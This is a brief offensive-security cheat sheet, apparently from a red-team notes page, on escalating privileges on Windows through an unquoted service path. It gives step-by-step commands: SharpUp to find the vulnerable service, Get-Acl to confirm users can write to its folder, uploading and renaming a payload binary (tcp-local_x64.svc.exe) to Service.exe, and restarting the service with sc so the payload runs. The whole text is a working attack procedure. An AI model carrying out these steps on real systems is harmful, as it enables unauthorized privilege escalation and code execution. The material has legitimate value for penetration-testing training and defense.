Unquoted Service Paths

Using SharpUp

Find vulnerable service

SharpUp.exe audit UnquotedServicePath

VulnService1 'C:\Program Files\Vulnerable Services\Service 1.exe'

Check write priv in folder of binary

powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl

BUILTIN\Users Allow  CreateFiles

Plant binary

cd C:\Program Files\Vulnerable Services
upload C:\Payloads\tcp-local_x64.svc.exe
mv tcp-local_x64.svc.exe Service.exe

Restart service

run sc stop VulnService1
run sc start VulnService1

Last updated 2 years ago